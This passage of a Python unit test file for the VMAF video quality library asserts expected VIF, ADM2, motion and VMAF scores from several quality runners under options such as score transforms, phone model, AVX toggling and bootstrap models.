self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.76614783252704499, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.86261788202730005, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.91587319935214206, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 3.5480006115798028, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.93454458698888132, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 3.5480006115798028, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 76.541148067714843, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 99.94504634354891, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 1.0, places=4)
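
# Re-aggregate per-frame scores with the 10th percentile.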
def test_run_vmaf_runner_pool_perc10(self):
print 'test on running VMAF runner (pool 10-percentile)...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
for result in results:
result.set_score_aggregate_method(ListStats.perc10)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.3324451679468679, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.73826183605283979, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.84227039935569437, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.9023292478206113, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 3.3064741, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.92385012173707182, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 3.3064741, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 72.753572476835515, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 100.0, places=4)
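
# Standalone ADM2 feature runner.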
def test_run_adm2_runner(self):
print 'test on running ADM2 runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = Adm2QualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['ADM2_score'], 0.93458780728708746, places=4)
self.assertAlmostEqual(results[1]['ADM2_score'], 1.0, places=4)
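
# Standalone VIF feature runner.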
def test_run_vif_runner(self):
print 'test on running VIF runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VifQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VIF_score'], 0.44609339583333335, places=4)
self.assertAlmostEqual(results[1]['VIF_score'], 1.0, places=4)
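
# Standalone VIF2 feature runner.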
def test_run_vif2_runner(self):
print 'test on running VIF2 runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = Vif2QualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VIF2_score'], 0.7272233644583975, places=4)
self.assertAlmostEqual(results[1]['VIF2_score'], 1.0, places=4)
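
# test_model_transform_add40.pkl adds 40 to the raw prediction when
# 'enable_transform_score' is set; the raw prediction here is about -7.24
# (compare the clip-disabled and transform-disabled variants below).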
def test_run_vmaf_runner_with_transform_score(self):
print 'test on running VMAF runner with score transforming...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'model_filepath': VmafConfig.test_resource_path("test_model_transform_add40.pkl"),
'enable_transform_score': True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale0_score'], 0.23738393128710478, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale1_score'], 0.08524788663335138, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale2_score'], 0.024058909404945077, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale3_score'], 0.018034879735107798, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 32.757433750978919, places=4)
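
# Variant model ('outltein') with 'disable_clip_score'; the resulting score
# is allowed to go negative.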
def test_run_vmaf_runner_with_transform_score_2(self):
print 'test on running VMAF runner with score transforming (2)...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'model_filepath': VmafConfig.test_resource_path("test_model_transform_add40_outltein.pkl"),
'enable_transform_score': True,
'disable_clip_score': True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale0_score'], 0.23738393128710478, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale1_score'], 0.08524788663335138, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale2_score'], 0.024058909404945077, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale3_score'], 0.018034879735107798, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], -7.2425662490210838, places=4)
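
# Transform disabled: the negative raw prediction is clipped to 0.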
def test_run_vmaf_runner_with_transform_score_disabled(self):
print 'test on running VMAF runner with score transforming disabled...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'model_filepath': VmafConfig.test_resource_path("test_model_transform_add40.pkl"),
'enable_transform_score': False,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale0_score'], 0.23738393128710478, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale1_score'], 0.08524788663335138, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale2_score'], 0.024058909404945077, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_scale3_score'], 0.018034879735107798, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 0.0, places=4)
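
# Default model with the phone transform on checkerboard content.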
def test_run_vmaf_runner_with_transform_for_phone(self):
print 'test on running VMAF runner with transform for phone...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'enable_transform_score': True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.053996580527295335, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 14.982837886251568, places=4)
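
# The next few tests mirror the transform tests above through vmafossexec.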
def test_run_vmafossexec_runner_with_transform_score(self):
print 'test on running VMAFOSSEXEC runner with score transforming...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafossExecQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'model_filepath': VmafConfig.test_resource_path("test_model_transform_add40.pkl"),
'enable_transform_score': True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale0_score'], 0.23738393128710478, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale1_score'], 0.08524788663335138, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale2_score'], 0.024058909404945077, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale3_score'], 0.018034879735107798, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 32.757433333333331, places=4)
def test_run_vmafossexec_runner_with_transform_score_2(self):
print 'test on running VMAFOSSEXEC runner with score transforming (2)...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafossExecQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'model_filepath': VmafConfig.test_resource_path("test_model_transform_add40_outltein.pkl"),
'enable_transform_score': True,
'disable_clip_score': True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale0_score'], 0.23738393128710478, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale1_score'], 0.08524788663335138, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale2_score'], 0.024058909404945077, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale3_score'], 0.018034879735107798, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], -7.2425766666666673, places=4)
def test_run_vmafossexec_runner_with_transform_score_disabled(self):
print 'test on running VMAFOSSEXEC runner with score transforming disabled...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafossExecQualityRunner(
[asset],
None, fifo_mode=True,
delete_workdir=True,
optional_dict={
'model_filepath':VmafConfig.test_resource_path("test_model_transform_add40.pkl"),
'enable_transform_score':False,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale0_score'], 0.23738393128710478, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale1_score'], 0.08524788663335138, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale2_score'], 0.024058909404945077, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm_scale3_score'], 0.018034879735107798, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 0.0, places=4)
def test_run_vmafossexec_runner_with_transform_for_phone(self):
print 'test on running VMAFOSSEXEC runner with transform for phone...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafossExecQualityRunner(
[asset],
None, fifo_mode=False,
delete_workdir=True,
optional_dict={
'enable_transform_score': True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.053996566666666669, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 14.982840000000001, places=4)
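
# 'phone_model' is vmafossexec's shorthand for the phone transform; the
# results match the 'enable_transform_score' run above.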
def test_run_vmafossexec_runner_with_phone_model(self):
print 'test on running VMAFOSSEXEC runner with phone model...'
ref_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_0_0.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "checkerboard_1920_1080_10_3_10_0.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':1920, 'height':1080})
self.runner = VmafossExecQualityRunner(
[asset],
None, fifo_mode=False,
delete_workdir=True,
optional_dict={
'phone_model': True,
},
result_store=self.result_store,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.0, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 12.5548366667, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.053996566666666669, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 14.982840000000001, places=4)
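
# 'disable_avx' selects the plain (non-AVX) code path; values differ from the
# AVX run only in the last decimals, so both runs assert with places=5.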
def test_run_vmafossexec_runner_disable_avx_precise(self):
print 'test on running VMAFOSSEXEC runner disabling AVX (precise)...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={'disable_avx': True}
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.363420458333, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.766647520833, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.862854708333, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.915971791667, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 3.8953527083333337, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.93458777083333333, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_psnr_score'], 30.7550666667, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ssim_score'], 0.86322654166666657, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ms_ssim_score'], 0.96324068749999991, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale0_score'], 1.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale1_score'], 0.999999958333, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale2_score'], 0.999999416667, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale3_score'], 0.999999208333, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion2_score'], 3.8953527083333337, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_adm2_score'], 1.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_psnr_score'], 60.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ssim_score'], 1.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ms_ssim_score'], 1.0, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.699306249999992, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 99.946416666666664, places=5)
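
# The AVX-enabled counterpart, asserted at the same precision (places=5).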
def test_run_vmafossexec_runner_enable_avx_precise(self):
print 'test on running VMAFOSSEXEC runner enabling AVX (precise)...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale0_score'], 0.36342081250000002, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale1_score'], 0.76664741666666669, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale2_score'], 0.86285333333333336, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_vif_scale3_score'], 0.91597195833333345, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 3.8953527083333337, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_adm2_score'], 0.93458777083333333, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_psnr_score'], 30.7550666667, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ssim_score'], 0.86322654166666657, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_ms_ssim_score'], 0.96324068749999991, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale0_score'], 1.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale1_score'], 0.99999985416666659, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale2_score'], 0.99999960416666667, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_vif_scale3_score'], 0.99999914583333338, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion2_score'], 3.8953527083333337, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_adm2_score'], 1.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_psnr_score'], 60.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ssim_score'], 1.0, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_ms_ssim_score'], 1.0, places=5)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.699266666666674, places=5)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 99.946416666666664, places=5)
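
# Model built on the motion2 feature (test_motion2.pkl); both motion and
# motion2 are reported.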
def test_run_vmafossexec_runner_with_motion2(self):
print 'test on running VMAFOSSEXEC runner with motion2 feature...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath':VmafConfig.test_resource_path("test_motion2.pkl")
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion_score'], 4.04982583333, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_motion2_score'], 3.8953522916666672, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion_score'], 4.04982583333, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_motion2_score'], 3.8953522916666672, places=4)
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 78.532525000000007, places=4)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 97.089554166666673, places=4)
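
# Bootstrap runner: besides the point prediction it reports a bagging score
# and the standard deviation across the bootstrapped models.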
def test_run_bootstrap_vmaf_runner(self):
print 'test on running bootstrap VMAF runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = BootstrapVmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath': VmafConfig.test_resource_path('model', 'vmafplus_v0.5.2boot_test.pkl'),
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.766647542135, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.862854666902, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.915971778036, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.93458780728708746, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.00000001415, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 0.99999972612, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 0.999999465724, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 0.999999399683, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_score'], 75.44304862545658, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_score'], 99.95804893252175, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_bagging_score'], 75.13012623785923, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_bagging_score'], 99.96504855577571, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_stddev_score'], 0.6812993325967104, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_stddev_score'], 0.03947607207290399, places=4)
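
# Bootstrap runner combined with the phone transform.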
def test_run_bootstrap_vmaf_runner_with_transform_score(self):
print 'test on running bootstrap VMAF runner with transform score...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = BootstrapVmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath': VmafConfig.test_resource_path('model', 'vmafplus_v0.5.2boot_test.pkl'),
'enable_transform_score': True,
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_score'], 91.72301218903131, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_score'], 100.0, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_bagging_score'], 91.51430018402004, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_bagging_score'], 100.0, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_stddev_score'], 0.4605056702850125, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_stddev_score'], 0.0, places=10)
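
# A bootstrap model with 10 sub-models; the stddev estimate comes out larger
# than in the previous bootstrap test.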
def test_run_bootstrap_vmaf_runner_10models(self):
print 'test on running bootstrap VMAF runner with 10 models...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = BootstrapVmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath': VmafConfig.test_resource_path('model', 'vmafplus_v0.5.2boot_test2.pkl'),
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_score'], 75.44304862545658, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_score'], 99.95804893252175, places=4)
